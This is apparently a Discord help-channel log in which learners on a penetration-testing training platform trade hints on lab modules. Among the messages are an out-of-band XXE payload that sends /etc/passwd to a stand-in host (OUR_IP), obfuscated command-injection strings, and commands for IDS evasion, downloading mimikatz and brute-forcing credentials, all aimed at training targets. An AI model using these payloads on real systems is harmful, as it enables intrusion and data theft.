#modules
I don't have it
Are you doing a module?
You probably don't have it set up as a binary.
Copy it to /usr/local/bin
and see if it works as aquatone
Should work
Use the command
sudo cp aquatone /usr/local/bin
and then type aquatone
It's not a binary and will run anywhere
That's a different question, I already have the flag for that.
I need help with this question
This works, but why do I put it in /usr/local/bin and why does it run everywhere?
And when I type aquatone, am I calling the binary that is in /usr/local/bin?
And if the file isn't a binary, does this still work?
Yes, you're calling the binary.
If it's not in the bin directory you can only run it where it's located,
e.g. you had to use ./ in the directory it was downloaded to.
Not sure
Can someone help me with the module Attacking Web Applications with FFUF section VHost fuzzing?
Try running a VHost fuzzing scan on 'academy.htb', and see what other VHosts you get. What other VHosts did you get?
I already found two VHosts, but it's not accepting those...
Thank you. So when I generally try only this subdomain, it creates a job for courses but never really finds anything (recursive png). When I try to check within courses, I can find some 403 not found pages when I remove filters, but that's about it. The image one is with filters (img2 png). Edited: Now solved
Never mind, solved it!
Feeling a bit dumb getting stuck so early, but can anyone help with the nmap enumeration medium lab?
||I'm supposed to use --script dns-nsid, from port 53, right?||
||sudo nmap -p139 --script dns-nsid 10.129.250.149 -D RND:9 --source-port=53 -sV --packet-trace -Pn||
Haven't tried the -e tun0/eth0 yet
Hello, can someone please help me with the ||Harry Potter|| task in Brute Forcing Logins? I feel like I've followed every advice - username-anarchy for login, CUPP with only first name or first name + last name with 1337, numbers, symbols, set the correct hydra flags, but even after hours of trying, I still can't get the SSH pass
Use CUPP like the module taught you. ||You can skip partner, child, pet, and key words||
Yeah, did that exactly. Just first name + symbols, numbers, 1337 - no match for a pass. But thanks anyway
Not using a good wordlist then
Wait, just first name? You need the last name
Tried that too, but I read from multiple people that you only need the first name (that's also what it says in the hint), so I didn't finish with both first and last name. But I did let it run for about 30 mins with no hits as well. As for the logins, I just use the full list from username-anarchy
I don't remember the exact creds, but use ||username-anarchy for usernames|| and ||CUPP with the above recommendations for password list. If you look back at 'Personalized Wordlists' there is something you can do to help with this||
Well, I'll keep trying :). If you mean sed, I did that to no avail. Hopefully I'll figure something out, thanks!
Did you let the hydra scan finish? And use the options taught in the module?
Never mind. For anyone not being able to brute-force the Service password in Login Brute Forcing for SSH: be sure to run hydra from Pwnbox; at least for me it didn't work through OpenVPN. Hopefully this can save someone a headache :). And thanks again, @rustic sage
Need help in the Command Injection module
Stuck on this
I tried base64 encoding; my payload: "ip=127.0.0.1%0abase64$%09-d%09<<<%09'ZmluZCAvdXNyL3NoYXxlLwAgfCBncmVwIHJvb3QgfCBncmVwIG15c3FsIHwgdGFpbCAtbiAx"
And I also tried ip=127.0.0.1%0afi'n'd%09${PATH:0:1}usr${PATH:0:1}share${PATH:0:1}$(tr${IFS}'!-~'${IFS}'"-}'<<<'{')gr'e'p%09root, but it didn't work either. I thought maybe it's the | problem
This is the question in Advanced Command Obfuscation
Keep playing with your base64
It's too easy
Execute the first command only
Copy the output to a text file and use the next commands without restrictions
Does somebody know how I can find the FQDN?
Hi, in the Vulnerability Assessment module, when I access the Nessus web interface I cannot access any scan.
I cannot access any report
Google what "FQDN" stands for
If anyone has done the File Upload Attacks module, I could really use a hint, I'm so close !
If you are accessing your own interface after a fresh install of Nessus, yes, you will need to wait for the plugins to install. This is why HTB has the pivot server that allows you to run it from there.
I'm accessing Nessus on the HTB machine in the lab
because I want to access the pre-loaded scan
Now I can access the previous scan report. I restarted the box 5 times and now I can access it
And you went to IP:8834?
Because they should be there
I had no issues with this when I ran it
Yes... Nessus had a message about an inaccessible API
when I clicked on a scan to view the report
But now it works
Thanks
Ah, yeah usually it's best to wait a few minutes before using services
I don't know how to make it executable... it's weird that when I ran `$(base64 -d <<< ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)` on my own terminal it throws **find: unknown predicate `-n'**. And this gets no response from the HTB server. When I use `base64 -d <<< ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=` directly, it returns the plain text of the decoded string
Hello! Any hints on why this final step in Web Server Pivoting with Rpivot is not working?
I have the connection already set up
Check your proxychains config file
Hint is in here; no protocol specified
How do I check that port 9050 is listening? netstat?
In what part of the command do I add the protocol? The notes don't say anything about a protocol.
It only says: We will configure proxychains to pivot over our local server on 127.0.0.1:9050 on our attack host, which was initially started by the Python server.
I checked and have the proxychains.conf correctly
Check your proxychains.conf file
cat /etc/proxychains.conf | grep 9050
Fairly sure it explains it in the module i.e. ||bash||
Can anyone help me with Attacking Common Applications II?
You can send me a DM
Hey, I'm playing around with database entries and curl. Does anyone know a prompt to delete a list of entries at once, so that just those which aren't mentioned in the list are left in the database?
Is DMing okay?
Stuck the same as you were; can I DM you?
I think you can open Firefox without proxychains and then configure the proxy with FoxyProxy. Don't forget to put socks5.
Ohhhh ok! I'm going to try that!
Why socks5?
Shouldn't it be 4?
In case you used chisel, you gotta put socks5.
I think it depends on what tunneling tool you used; could you specify the module please?
Hello all. I am currently struggling with the first question on Password Attacks - Network Services. I used the provided resources for username list and password list. So far I am not getting anything for passwords. Is there a better list out there to try and use?
I don't know why I am wrong in the python 3 module:
Hi, I'd like to ask you for some help, I've been trying on my own for a long time without any results, am I missing something or is it the wrong way?
Hi baffon, try running zap hub with Google Chrome. It's working for me.
Can DM me
I figured it out lol
Hello!
I've been trying many things but I don't know what's the matter with the cmd command in Port Forwarding with Windows Netsh
Hi mate, a tad busy today but I'll definitely look through my notes for you later
I have tried like this and with the IP of the RDP session I have... but it doesn't work
Thank you so much for getting back to me, I have just finished this and your words have inspired me and I am here to express my gratitude to you
In the notes I don't know how they manage to get the 42.198 to listen on 8080 if the command says 15.150
Maybe the command isn't properly entered... I don't get the same output
Any ideas?
Hello, I have an issue with "appointment". I can ping and nmap the machine. I cannot connect to its ip, however. I want to begin the sql injection. Can anyone provide ideas? Thanks
Request for Help. Module: Network Enumeration with Nmap - Firewall and IDS/IPS Evasion - Hard Lab.
I've run my nmap scans against the target and identified a port with a non-common port number. My problem is that I can't seem to get the service version out of the target. Any assistance would be helpful.
some bytes are ||magical||
The module discussed a trick that some services will use ||so nothing appears in nmap or so that it appears as down. Look into that :)||
Can anyone lend a hand with Attacking Enterprise Networks? I'm at the Active Directory Compromise module, and I'm supposed to add a fake SPN and then kerberoast the user.
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
acmetesting/LEGIT ttimmons 2022-06-01 14:32:18.194423 <never>
[-] CCache file is not found. Skipping...
[proxychains] Strict chain ... 127.0.0.1:8081 ... 172.16.8.3:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:8081 ... 172.16.8.3:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:8081 ... 10.129.86.167:88 <--socket error or timeout!
[-] Principal: INLANEFREIGHT.LOCAL\ttimmons - [Errno Connection error (INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused
It looks like the first 2 packets are correctly going to the DC, but the third one routes to the pivot host and fails
I've tried using sshuttle instead of proxychains as well
Thx. I got it. I'd tried something similar with an incorrect option for the argument. Made literally one adjustment and got what I needed. Appreciate the help!
Hi
Can anyone help me with Footprinting Lab - medium?
I downloaded the NFS shares but I'm not sure how I can change permissions on each ticket. Is this a good working path for this quest?
Right, from a domain machine
The answer was that I had a DNS record for inlanefreight.local that pointed to the host IP rather than the DC. It's always DNS.
@flint chasm -- some hints below
||You can just mount the NFS share with the command found in the cheat sheet. Once you mount it, you will see you don't have access... but which account on your computer might have access to everything? Use that one.
Once you have all the tickets, you will notice that is A LOT to go through to find sensitive information. How might you automate this process? Hint - ChatGPT is your friend||
Can anyone help me with the SQLmap essentials?
Thanks a lot! I use root but can't open anything
Hi, can someone give me a hint for the Broken Authentication skills assessment? I got the password for support.xx and then switched the cookie to admin, but I can't find the admin panel. I have used wfuzz to find directories, so I have no clue as to where the admin panel could be. Thank you for your time, have a great day
How does it want me to submit multiple answers? I found ||#|| subdomains, which are ||not here|| I tried submitting the names separated by spaces, commas, commas with spaces, but it kept saying it was wrong
Which module and section is this question on again?
ATTACKING WEB APPLICATIONS WITH FFUF module, Skills Assessment - Web Fuzzing section
It should be space-separated
Perfect! Can you remove the answer from this to avoid spoilers?
Okay, ty!
Is it normal for my FFUF to average 255 req/sec? It seemed like it was much faster in the academy
Yeah, a live internet environment is gonna be more wonky than a VPN or Pwnbox connection
Hey. I am currently doing the Vulnerability Assessment module and at the OpenVAS Skills Assessment the target box (which should host the OpenVAS web instance) is not working. Like, I can connect to it via SSH fine but no OpenVAS is installed. Can anyone here help me? Am I doing something wrong? It worked fine when I did the Nessus Skills Assessment
Did you solve this?
I think what you did was correct
As far as the eye can see
Did you navigate to the IP:OpenVasPort in the browser?
Yeah
Sometimes it's a bit janky
so you may need to restart and wait a few minutes before trying
Tried restarting Pwnbox and the target
That module takes time, so it's more of an oven timer: start the target, then read the section
By the time you get to the target you're good
Currently getting this when I try to do <ip>:8080
Yeah, had the same problem with Nessus, but when I tried both http/https it was probably not loaded by then, and after that I didn't think about retrying it with https again
np, because for the most part the targets that have been web targets either are autonegotiated OR are just http://
Keep in mind that the IP addresses you use with that command may differ in the environment when you spawn the target. Feel free to DM me if you are still stuck on that challenge.
@carmine kiln just a query, not sure where to ask this. Loving the modules. I notice HTB have a dedicated module on hacking WordPress; are there plans for more dedicated modules for things like hacking Joomla/Drupal etc.? I assume the team are constantly working on new modules which are relevant
WordPress got a dedicated module because it has over half the market share for CMS. Not saying it's impossible for dedicated modules for Joomla/Drupal, but I think priorities are elsewhere
Yeah of course, just wanting to see if that's something they consider
Attacking Common Applications has a lot of Joomla and Drupal related stuff
Yeah, working through that now
As @rustic sage mentioned, I guess WP is so large with all the plugins and themes that the attack surface is huge and needs more module work
Thanks man
Domain Admin user bross
I need help with the Pivoting module skills assessment. I can't seem to get the reverse port forwarding to work via meterpreter on the target m*
Can someone explain how this works: fadvieb@htb[/htb]$ cat < stdout.txt
Hello guys, I have a question: where can I report something that I think is bad writing in some module?
I need help with the Linux Privilege Escalation module, 'Cron Job Abuse'. I transferred pspy64s to the target via a Python server and wget, but when I want to execute pspy there, it says:
./pspy64s: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./pspy64s)
./pspy64s: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./pspy64s)
Will there be a certification with the future red team path?
Try downloading an older version of pspy
Don't use the small version, download the big binary
Doing the Pivoting module, trying to get the msfvenom payload on victim 2 (Windows machine), but certutil won't work via download, giving me this error. Any help?
WinHTTP: is this referring to the internet? Or some network capability to download?
Hello All
I'm trying to finish the second lab, Footprinting - Medium
I got the user alex and his password, and I got the important.txt also
But how can I log in to MSSQL?
Remove the -split flag and try again
Thanks, but still the same error :S
A quick Google gives me this reason:
Error "12029" is a WinHTTP error code that indicates that a socket connection failed because encrypted communication could not be established.
Something to do with HTTPS and not having a valid certificate
What command are you running on victim 1?
Yeah
No command. I have tried to send the Windows payload to the machine and host it to see if that would work (I thought maybe some internal network block)
I thought victim 2 (the Windows machine I'm pivoting to) could download from my attacker
considering I have the RDP session and portfwd up
Hmm, weird
When I go to the internet browser on the RDP session it gives me this:
I thought it looked kind of strange
Have they configured settings to block this download?
You have obviously done it?
This is the Meterpreter Tunneling & Port Forwarding section?
Yes
I just followed the steps in the module and it worked for me
Hi all
I am in the module AD Enumeration & Attacks, section Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
I'm blocked on the last question: Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop.
I got the user s*****o and his password but it's impossible to get a shell. I tried psexec.py FREIGHTLOGISTICS.LOCAL/sxxxxo@academy-ea-dc03.inlanefreight.local -target-ip 172.16.5.5 -k or evil-winrm, but nothing works.
I get a Kerberos session error with the psexec command. Please, if someone can help me
Have a great day
Actually got it
Had to use
Invoke-WebRequest -Uri "http://172.16.5.129:8001/backupscript.exe"
Are you using the provided jump host?
And are you sure that this is the correct IP address of the requested target, e.g. DC03?
Not sure, in fact
But I don't know how to check
The section doesn't give any info about an IP
crackmapexec, nmap or something else
Thanks, in fact the IP was incorrect; a network scan gave me the right one. My last question was a little bit stupid xD
Thanks dpgg
In Weak Bruteforce Protections (Module: Broken Authentication) I am wondering if I am using the correct CSV (default-password.csv) with the "basic_bruteforce.py" script in the module. I also added the X-Header 127.0.0.1
nvm, used Burp and I realised username and password do not matter <.<
I can see that there is a connection on port 1234 to the first pivot host. I ran the reverse port forward command to forward connections on 1234 to 8081 on my attack machine, but Metasploit isn't hearing anything.
I can even see 1234 connected, but no idea why it's not forwarding to my attack machine
Please help XD
I'm not at home, I have my notes there! If you haven't solved it by the evening I can help you out! I'm in Spain
Hello, I'm stuck with Port Forwarding with Windows Netsh
I assume I have the right setup but I can't get the final xfreerdp session for user "victor"
Any ideas?
I always get this response after executing the xfreerdp command:
Doh! I feel so dumb..... Was trying to figure out a username and password after enumeration and tried different techniques.... In the end it was admin/admin
I can't upload screenshots here?
Anyways
I'm a beginner at Python and I have a doubt
Can it be print(10 * "X") instead of print("X" * 10)?
So I figured out that times 10 after a string prints it 10 times
What if the times 10 is before the string?
Does exactly the same thing
Okay
Happens to the best of us
Based on the commands you executed, what is likely to be the operating system flavor of this instance? I am stuck on this question. I tried different answers based on typing 'uname -a' but none of my answers worked
Can someone DM me about my issue? I have been working on this for a while.
Never mind... just fixed it
You probably have no reverse connection set up or socat set up (no redirector); you'll need to either set up socat or a reverse portfwd
Hi all, have a doubt in here: https://academy.hackthebox.com/module/143/section/1508 (Attacking Domain Trusts - Child -> Parent Trusts - from Linux section in the Active Directory Enumeration & Attacks module). I solved the question but want to discuss the way I did it with someone who has done it already. You can DM, thanks!
Is there a way to copy text from outside the spawned terminal into the spawned terminal machine of the modules?
Try Ctrl+Shift+C, and to paste, the same but with V
Did it work?
Nope
I fixed it.
So when my platinum plan renews do I get an additional 1000 points?
Hi, I'm in the hard lab of Password Attacks. I got the user d#### & the password in the KeePass but it doesn't work. Any hint please?
Hi there, I have a question about OOB XXE,
The module says we can create a DTD file as below:
```dtd
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
```
Then the payload as below:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/oob_xxe.dtd">
%remote;
%oob;
]>
<root>&content;</root>
```
Then we can get /etc/passwd from the victim server, but why?
According to the payload, I think we will get /etc/passwd from the attack server, not the victim server, because the victim sends a request "http://attack:8000/?content=php://filter/convert.base64-encode/resource=/etc/passwd"
Could anyone give me some ideas?
Thanks!
have you gotten an answer to this yet?
Hi, did you manage to do it using mimikatz? Is it supposed to show the cleartext password? No need for hashcat?
I think that the payload gets the victim server's /etc/passwd first, then puts the base64-encoded file content in the content parameter. So we get the /etc/passwd which is from the victim server.
Basically what you are saying is correct. I would add that it is the .dtd file combined with the payload that enables this OOB XXE. It's a lot easier for me personally to understand it when I go through how the victim processes the information in an XXE step by step. So in case you don't understand why the rest of the payload/.dtd file is needed outside of just the PHP encoding and sending /etc/passwd, I would recommend that.
I want help with the **Pivoting, Tunneling, and Port Forwarding** Skills Assessment. I'm trying to download a file from ||PIVOT-SRV01|| to my attack machine. Can I DM someone?
Have you tried the File Transfers module?
I will do this. Thank you a lot!
Hi all
I am in the module AD Enumeration & Attacks, Skills Assessment Part I
I got the first cleartext password, pivoted and RDP'd to the second network 172.16... as sxx_xxx
I found the user txxxx and his password.
But I can't understand how to perform the attack. mimikatz doesn't work locally
and I can't find a way to use secretsdump locally with proxychains
If someone can help me it will be very much appreciated
Have a great day
mimikatz should work. ||Do a privilege::debug to verify perms, or just make sure the cmd/PowerShell window is running as the correct user.|| Another: ||other tools you can use besides mimikatz||
Request for Help. Module: Footprinting - SMB
Breezed through most of this with no issue and finally hit a wall. I'm on the last question -- "What is the full system path of that specific share?" I've enumerated the target with rpcclient and when I copy/paste the given path, I get an error about path types based on OS. Any assistance would be helpful.
Edit: Solved. Did some googling on OS syntaxes with regard to file directories.
Yes, the debug command works with return code 20, but I get ERROR kuhl_m_lsadump_dcsync
I'll be home later to help. My advice would be to check back at the section and make sure you're executing the commands properly
That's exactly what I am doing, but I can't get what I'm missing ^^
Give me like 30ish minutes if no one else can help by then
Sure, thanks!
Module "Abusing HTTP Misconfigurations", Section "Premature Session Population": I think I am replicating the attack exactly as stated in documentation, but it won't work. Could someone look into this please? Thx!
DM me with the commands you're trying
I need help on Linux Local Privilege Escalation - Skills Assessment second flag 
Just when I was almost done with Attacking Common Applications, 13 new sections added
Sorry, but this question https://academy.hackthebox.com/module/19/section/103 was really stupid... How are you supposed to know you have to wait 30 sec before getting the flag? I literally don't see any way you could find this without just plain luck...
Can anyone tell me if there's a hint I missed?
I believe the nmap module discusses how services will do this so that nmap cannot footprint the software and version number.
Okay, but then are you supposed to read the next sections before being able to solve the question?
If that's the case then that's good to know
I don't remember exactly what section it is mentioned in
Any idea on this, please? ACTIVE DIRECTORY ENUMERATION & ATTACKS -
Can you help me, sir?
bump
Yess
I need a nudge with finding the WinSCP credentials in the module Credential Hunting in Windows, if anyone cares to help
I just got done with this module. So what command did you use to set the port forward? Using Metasploit, correct?
Like, I can see the connections being made
but I don't know why Metasploit can't catch it
Did you set the payload?
Hold on, I'ma DM you
Hi people, I'm stuck with Password Attacks Lab - Medium
I'm trying to crack the password for Docs.zip after running zip2john on the file, but I can't get the job done with john, so I've tried to use hashcat, but I can't find the correct mode for the zip file. I've tried all the pkzip modes
Can anyone help me?
Can I DM you?
Are you sure it's a zip file? Run file docs.zip to verify. If it is a zip, make sure you didn't corrupt the file on transfer and/or recheck the commands you're executing. You could also redownload the file to be safe
What do you need help with? If you need help with file transfers, that module should be more than enough
Docs.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
Please tell me what you're struggling with, and if it requires DM we can go there
You can DM me with the command you're using to obtain the hash
OK, thanks
Has anyone completed https://academy.hackthebox.com/module/191/section/2055
Log Injection first question
I haven't, but just an FYI: no one memorizes the modules by number and section number. Far easier if you just say the module name and section rather than sending the link
Module: Pivoting, Tunneling, and Port Forwarding
Skills Assessment Final Question
How do I get into the DC? Hints?
Nvm, solved it
Is Academy worth it? I haven't seen any posts or anything about success stories but I want a general consensus. I'm in my 2nd year of schooling for Cybersecurity.
Success stories for what?
I've learned a ton from it, especially if you're a student and can take advantage of the $8/mn subscription for all content <= Tier II. The HTB certs are still fairly new, so you won't see companies seeking individuals with them, but some people who've taken both CPTS and OSCP say the CPTS is more realistic soooo. It's also a lot cheaper
It's a learning platform, not an "I got a job" thing
Thanks dude, I appreciate this a lot. Just feel like I can delve deeper into things outside of school. I also appreciate the heads up on the membership price as well!
I went on a 10 year hiatus from hacking stuff and a lot of my knowledge got outdated; the academy has been pretty instrumental in catching me back up to speed. It's good stuff.
Also, cyber security degrees still don't have much respect. The college and uni programs for them aren't really refined yet and often focus on old stuff that isn't updated fast enough
So yeah, you're absolutely going to learn more out of the classroom in this field
That's how I'm feeling right now.. I feel like my school isn't necessarily teaching me enough, but I gotta stick it through for the paper. I appreciate you taking your time and letting me know. I'll be trying it all out tonight.
Might be a bit late now, but it's why I recommend people just go for comp sci degrees with maybe a focus in cybersecurity rather than primarily having a cybersecurity degree. Comp Sci degrees are good and you get more mileage out of them.
But having a cybersecurity degree is still going to be useful over having no degree. Just make sure you're supplementing with actually useful information, such as with Academy
Request for Help. Module: Footprinting - DNS
Q: What is the FQDN of the host where the last octet ends with "x.x.x.203"?
I completed a number of zone transfers and tried running a few different tools/scripts to brute-force (using various wordlists) both the second-level domain and the subdomains, but came up with nothing fruitful. Any assistance would be helpful.
How would someone go about bypassing a filter that removes "<>" from "<?php+echo+'pwned';+?>"
Have you found all the zones?
If so, start with the smallest list of SecLists. You don't want to overload the server right away.
If you can't find the host you're looking for, then take the next largest list and try that.
I think it's worth it, learned quite a lot. Stay close to this Discord server though, because the people who wrote the modules are independent people from all over the world and there is a lack of logic or reasoning behind a lot of the questions
@onyx rapids Hey, thanks for this. Hopefully there is no shunning for asking dumb questions, cause I'm sure I'll be full of them
The search feature will become your best friend here, it saved me many times. There was also a user with a squirrel avatar that was always helpful and seemed to know everything, but I'm not sure if they are still around
I've finished everything in the bug bounty module, but don't ask me questions because I don't want to relive the trauma of trying to figure out what the people who made the lab did
There are no stupid questions.
If you don't understand something, ask here. I am sure that you will get an answer
In my experience it's mostly a failure of the student reading it rather than the author. There's a couple I agree are truly weird, but they're few and far between.
Hello, I am working on the AD Administration: Guided Lab Part I in the Introduction to Active Directory module. I am trying to RDP into the lab box with xfreerdp, but keep getting the following errors.
[15:02:14:265] [21409:21410] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[15:02:14:265] [21409:21410] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[15:02:14:265] [21409:21410] [ERROR][com.freerdp.core] - freerdp_post_connect failed
Have you given the target like 2-3 minutes after you have spawned it?
Yes. I'm restarting my VM and changing the VPN server and am going to try again, but I have tried a few times.
Can you prove me wrong on the "HTTP ATTACKS" "Log Injection" question?
I was able to complete the zone transfer for the second-level domain as well as one subdomain. Beyond that, I'm not certain if I'm missing any additional ones (even though I tried all the others).
Remember, there are zones that allow zone transfer from everyone, others allow zone transfer only from certain servers.
If you get stuck, feel free to send me a DM
Haven't done that module
DM'd
I was able to get it to work. Thank you.
Hey guys, super new to this and been running through the basics, but I seem to be stuck. I'm doing "Introduction to Windows Command Line" in the "Skills Assessment", question 8.... I have logged into the User7 account, I used SSH to the IP address and have found the module in question, but I can't seem to find the flag.... The hint says to look at the members and I have.... Not really sure where to go from here
Nvm, I went wayyyyy too deep in the weeds and wayyyy overthought it
I was wrong. I needed to dig deeper.
Hi all,
I'm in the Password Attacks module, Password Attacks Lab - Easy section, trying to find the root password. I've managed to get access with ||user mike via SSH|| and have tried all search scripts in the Credential Hunting in Linux section without anything noticeable sticking out. Furthermore, I tried looking at the /etc/passwd and /etc/shadow files but they don't seem to have a weakness.
Can I get a hint please?
Can anyone help me with this module? https://academy.hackthebox.com/module/54/section/511
I got the first two questions correct but the third question is asking me to find a page that says "you dont have access", and I cannot manage to find this page. I am using fuzzing scans which I will paste below but I am not getting any results other than finding ||a /courses folder|| and ||index.php pages||. Here is the command I ran:
||ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://test.academy.htb:30261/FUZZ --recursion -e .php -v||
I also replaced ||test.academy.htb|| with the following and ran the same command:
||academy.htb||
||archive.academy.htb||
||faculty.academy.htb||
But I was not able to get anything. I was getting the index pages returned so I know the command worked, but nothing other than index pages and a ||/course|| folder.
hello, I have a problem connecting to the xfreerdp server for the module (Packet Inception, Dissecting Network Traffic With Wireshark). I get this when I try to connect: (login failed for display 0). Any solution? thanks.
I got this hint as well:
||Use 'PORT' instead of the port shown above, like http://xxxxx.academy.htb:PORT/xxxxxxx ..etc|| but I did exactly what it said ||(replacing the port number with PORT)|| but the scan did not work at all
you don't literally replace it with the word PORT
what do i replace it with?
I always have the actual port there but I'm not finding anything useful
it would indeed be the port of the spawned instance
Can you think of something else I'm doing wrong? I can't find any pages other than index
rest of post is here
you're ruling out extensions other than just .php
I did an extension scan and I only got .php .phps and .php7
I tried php7 before and got nothing useful
I tried phps and it turns out it's just the backend stuff so nothing useful
Well, I'm asking for some hints on what I overlooked
that's challenging without giving away the answer
but if you've checked the things you said you checked then you had the desired result already and dismissed it. So review the stuff you dismissed too early.
can you at least give me a subdomain I need to check?
if you're talking about the /courses part I set it on recursive so it checks that part too
no, it's a skill assessment
can anyone help with this module? https://academy.hackthebox.com/module/113/section/2166
yes but it's still to help me learn and I'm not learning if I'm stuck doing the same thing over and over
not knowing what i did wrong
Reread the modules and keep trying :)
sorry my dude but it's a skill assessment, it's a test.
you need to review your results closer
I do not see the button to start the machine, I was told that to answer the question of this module, I should use the machine of the previous module, which is a windows machine, but the vulnerability in question seems not to be relevant for windows, only for linux
I get that but it's annoying having to wait 15 minutes to fuzz a subdomain each time I'm wrong
just a waste of time
I don't think your fuzzing itself is wrong, I think you're literally overlooking your results
feel free to dm your fuzz results for each domain
It also helps to give module name instead of just the link
Attacking Common Gateway Interface (CGI) Applications - Shellshock
I apologize for the trouble I was really frustrated. I found the answers now, the recursion depth was the issue
ye I see how that might've done it
can anyone help me with the command injection web skill assessment?
I think it passes the filter but I'm not sure why I'm not getting any results...
@tough fjord I need help, my university domain isn't in the HTB valid academic domain list
contact support via the academy website
anyone do the new thick client stuff
and having trouble submitting the uname as the answer?
anyone there
thank you
Hi can anyone help me with this module? https://academy.hackthebox.com/module/18/section/80
I'm struggling on the third question: " Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer. "
I have already tried multiple commands several times and still get the error "0curl: (6) Could not resolve host: www.inlanefreight.com"
Just starting out, would appreciate the help!
you need to add the domain to your /etc/hosts
OH
okay
lemme try that
I'm on the Attacking DNS section of Attacking Common Services. The hint says to use subbrute. No matter how I try to run it. I get the same error. zsh: no such file or directory ./subbrute. Has anyone seen that before? I installed it from github just like it says to in the module.
looks like you're either not in the directory for subbrute or didn't follow whatever installation instructions it may have had
I'm in the subbrute directory and I installed it on my Kali VM just as it specifies. I'm not sure what I could be doing wrong.
what's in that directory. ls -la
dnslib, .git, LICENSE, names_small.txt, names.txt README.md, resolvers.txt, subbrute.py, windows, windows_setup.py.
Does that look right?
looks like you have a subbrute.py file instead of a subbrute bin
so either chmod +x and then run ./subbrute.py, or call it with python: python3 ./subbrute.py
Okay, I'll try that. Thank you.
@thorn urchin That looks to be working now. Thank you!
np
Now, I'm just getting errors when it runs. I'll try it in the pwnbox.
Nope, same errors in the pwnbox.
You can refer to password spraying in windows section.
Please refer to internal password spraying in windows section
no hit?
Maybe you should be doing some manual checks?? That one is hard to give a hint to without giving away the answer, but sometimes people type stuff in the terminal that they shouldn't.
General Mills - Hackathon 2023 access key is what ?
thx... I solved it
Did you ever finish this? I'm kind of lost. Trying to trigger the basic XSS Alert(1) payload, but it won't work, just displays the code back to me
has anyone here completed the password attacks module?
Was Attacking Common Applications just updated????
I was going to start cpts exam tomorrow, but now I have not completed this module. I really thought I did them all.
I am trying to do it now, but the section: Attacking Common Gateway Interface (CGI) Applications - Shellshock is asking me to attack the target... but there is no target to spawn
the Attacking Common Applications module just got 11 new sections today...
hello, I am in the DNS sub section of footprinting module 2. I would like to know if, for the last question (FQDN of ...*.203), editing the host file is necessary?
for pivoting module skills assessment is anyone else running into issues with rdp into m* user?
forcing myself to use tmux, I miss the mouse wheel tho
No, why would that be necessary?
You want to find out the IP of a host.
The hosts file is actually a relic from the old days. To resolve a domain to an IP, your PC first looks into its cache, then into the Hosts file. If it doesn't find an IP, then it queries the configured resolver.
To any future people using pwnbox to do the Oracle TNS exercise (the newly added one): you'll get an error when you run sqlplus, which is "sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory". You fix this by: export LD_LIBRARY_PATH=/usr/lib/oracle/19.6/client64/lib/ . You're welcome future ppl...
hi @acoustic owl, I'm a few days off sitting the exam, I've noticed in discussions re offshore that many people used some sort of c2 (covenant mostly). did you use one for the exam?
any discussion about tactics used for the exam afaik are not allowed :)
at least definitely not publicly on the HTB discord :^)
I only used tools that was discussed in the Academy in the modules.
ok awesome
am i allowed to ask if you used any command prompt logging for easier reporting? 
I'll take that as no because it wasn't discussed in the academy
I'm looking forward to having the spare time to do it. failure on first attempt almost assured but I can't wait
You can use any tool you want
https://www.youtube.com/live/wwmCHeYd1I4?feature=share&t=6403
this is literally in the documentation and reporting module
Roger that
specifically it covers using tmux for logging
Yes, I've started using tmux for this reason, makes sense
I was more asking for personal opinions/experiences
Not necessarily in context of exam (I understand this is not allowed)

module ATTACKING COMMON APPLICATIONS section Attacking Thick Client Applications
error when executing RestartOracle-Service.exe. I followed the section
Which module?
FILE UPLOAD ATTACKS
Page 5
Blacklist Filters
Blacklist Filters
You need to find a suitable file extension.
Try it with the Intruder
No, but I was too busy to try it again. I can trigger the XSS but it seems that the admin bot never visits it
e.g:
(other methods don't seem to work either)
Hey Guys
you are missing a parameter in your command
additionally, you must have assured yourself that you can write files in your current working directory
bump
thanks, did it. To run mimikatz, I have to pass the .ps1 file? Cause I can't run it on the target machine..
up to you to find out
I tried both .exe and .ps1. None of them are working. Is there some resource to look an example of how to run mimikatz when it's not on the target machine?
the idea is to have it on the machine
or to execute it in memory, but that's a different topic
is roadmap.sh cyber security roadmap good?
@spare condor Write again mimikatz.exe like wget http://ip address:port/mimikatz.exe mimikatz.exe
On the target (windows) machine? Without -OutFile ?
@spare condor It works the same
@spare condor how about trying to use invoke-webrequest
Hello! reverse connection?! in the module says nothing about it...
Hello, I'm looking for some help in the Port Forwarding with Windows Netsh module
anyone?!
ask a specific question bro and someone will help eventually
i recommend providing information on the module question and what you've tried etc
@arctic sentinel what is the problem
I'm talking with HTB staff... I can't open an rdp session on a remote server using the netsh.exe command
I have changed several vpn servers... maybe I'm doing something wrong...
It's a random port I guess... there is no special mention as in why we should use 8080
@arctic sentinel Did you check the ip address on the listening address
In the listening address?!
with netstat command?
@arctic sentinel is it skills assessment or
No, it's the Port Forwarding with Windows Netsh
@arctic sentinel You will use the ip address that is given
